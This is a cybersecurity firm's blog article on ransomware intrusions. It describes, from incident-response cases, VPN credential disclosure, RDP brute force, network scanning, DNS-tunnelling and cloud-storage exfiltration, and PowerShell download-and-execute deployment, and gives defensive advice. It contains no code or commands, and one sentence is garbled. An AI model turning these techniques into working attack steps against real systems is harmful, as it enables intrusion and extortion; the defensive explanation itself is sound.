Cyber Attacks: Attacker Techniques and the Business Impact
Many businesses across the UK are concerned about the impact that a cyber-attack can have, especially the ramifications of a ransomware attack. Recent news has been dominated by the devastating and detrimental effects of ransomware attacks across the globe, including those launched against the Colonial Pipeline in the US, JBS Foods and KP Snacks. Research clearly illustrates the increase in ransomware attacks compared to a pre-pandemic world.
From IntaForensics perspective, this has been almost directly attributable to the sudden growth in homeworking as a result of Covid-19. As more businesses rushed to enable remote working for their employees, they had little time to assess the security impact. As a result, many companies were enabling systems and services without proper security risk assessment. Whilst this was a challenging time for people and companies across the globe, for attackers it was a great opportunity as their potential list of targets suddenly grew on an exponential scale.
What is the most common technique for cyber attacks?
However, it is a common misconception that ransomware attacks are the most common type of attack that businesses face. In fact, according to the DCMS Cyber Breaches Survey 2021, ransomware attacks were only the fifth most common type of attack that businesses reported experiencing – with 7% of businesses and 6% of charities reporting that they suffered a ransomware attack in the last twelve months*. The most common mode of attack by far is phishing emails, with 83% of businesses and 79% of charities having reported this form of attack. Nevertheless, the impact of a successful ransomware attack can be much more serious than that of a phishing email.
In our experience, there are three tactics that attackers use as way to initiate contact to exploit and breach an organisation’s security for ransomware deployment. The three methods are via a vulnerable VPN service, publicly available remote desktop access and phishing emails – resulting in the removal or exfiltration of data.
Vulnerable VPN Service
Recently, we were called to investigate a VPN ransomware attack against one of our clients to determine how this occurred. As with many businesses during the government-imposed lockdowns in the UK, our client had made remote access to their company infrastructure available to their staff so that the business could continue to operate. The business enabled a VPN service on their Fortinet firewall. Unfortunately, it became clear that this version of the system that their firewall was using was exposing a credential disclosure vulnerability.
This meant that an attacker, using a specially crafted request to the firewall, would be able to retrieve a list of usernames and passwords for all VPN users. One of the first questions we ask customers when performing incident response engagements for ransomware attacks is ‘what remote access arrangements do you have in place?’
By analysing the firewalls logs as part of our investigation, we discovered that user accounts had been accessed from unusual IP addresses. In fact, these IP addresses were not associated with the users or located in the UK where all of the employees were based.
Also, the client had also enabled single-sign on. This meant that once the attacker had these VPN details, they were then able to access the customer environment directly and proceed with their ransomware attack. Our penetration testing team were able to re-create the attack and provide advice and guidance to prevent a similar attack from happening in the future.
Publicly available Remote Desktop Access
Another common form of initial access that we see exploited by attackers is Microsoft’s Remote Desktop service.
One our clients suffered a brute force attempt against their publicly available remote desktop service. The attacker tried multiple combinations of usernames to gain access to the organisation’s server. As a result of our client not enforcing a sufficiently strong password policy and having no monitoring in place, the attacker was able to find a username and password combination that worked and was able to access their environment. This unfortunately led to a ransomware attack across the business.
Once an attacker has access to your systems, what happens next?
To deploy ransomware, attackers need to understand your environment and the type of systems you are running. This can be achieved with ‘network enumeration’. Typically, attackers will run a tool designed to sweep a network and identify any live systems, which they then probe further for more details, such as whether the system is a file server or workstation.
One of these network enumeration tools available is called Advanced Port Scanner. This tool was run on one of our client’s customer networks. The attacker had managed to gain access to a server, then they installed and ran the Advanced Port Scanner tool. Once the network scan had been completed, the tool was removed so that any quick review by the company would not have identified its usage. By looking at the organisation’s event log records, we were able to identify the tool was used, the scope of the scan and even the user account that had been used to install it.
As our customer had a ‘flat’ network, with no separation between system, this unfortunately meant that the attacker was able to target the entire environment for their ransomware attack.
Removal or Exfiltration of Data
Another tactic that is increasingly used by attackers is the removal or exfiltration of data from customer environments. This tactic is used as a method to convince companies to pay ransom demands. The attacker will threaten the release of the stolen data unless the ransom is paid. Here at IntaForensics, we recommend that an organisation never pays the ransom. This is because there is no guarantee that you will get your data back, your environment is still vulnerable and you are likely to be targeted again.
There are several methods we have seen attackers use to remove data from a network. More sophisticated attacks use techniques such as DNS tunnelling. This is a of a compromised environment. It shows customer’s data being transferred out of the network disguised as DNS queries. Luckily for our compromised client, we were able to identify the transfers taking place and limit the amount of data that was taken. These kinds of techniques are rare, but it does highlight the need for a good monitoring system to be in place.
Another method of data exfiltration relies on the use of freely available services, such as Dropbox or Google Drive. An attacker can easily create a free user account on these services, which gives access to a significant amount of storage for free. For example, Google Drive offers 15GB for free when users create accounts. This is plenty of storage space for thousands of documents to be stored.
Google Drive and Dropbox are also used by some companies for legitimate business services. This can make identifying the bad requests difficult for internal teams to identify.
How do cyber attackers push ransomware into your system?
The final tactic used by attackers is deploying ransomware within a target environment. As most businesses use Microsoft Windows as their core operating system almost exclusively, we see ‘PowerShell’ being used to push ransomware into systems to compromise their environment. PowerShell is a useful and powerful tool for system administrators to use. However, this tool is attractive for attackers to utilise too, as they don’t need to install or configure any tools of their own into an organisation’s environment.
What is PowerShell?
A PowerShell command was run in one of our client’s environments. In this example, the PowerShell script itself was hosted on a compromised web server outside of the customer environment. A PowerShell command was used to download the script from the web server before executing it within the customer network. The script was the actual ransomware payload and, when executed, would encrypt files on systems. The attacker used a single compromised server to push ransomware script out to every server in the customer environment using PowerShell’s capabilities. We were able to advise our client on configuration changes to make in their environment to ensure that only trusted PowerShell users were able to run to help minimize the risk of any future attacks.
IntaForensics provides a comprehensive range of cyber security services designed to prevent, monitor, and respond to security breaches.
We boast a team of 50 cyber security and digital forensic experts and a growing market presence. Our consultants will be able to assist with all digital forensic investigations, PCI DSS PFI and QSA, Cyber Security and Incident Response.
Quality underpins everything we do, and we are proud to be UKAS 17025:2017 accredited and ISO/IEC 27001:2013, ISO 9001:2015 and ISO 14001:2015 certified.
For further advice on protecting your organisation against ransomware attacks, please contact us.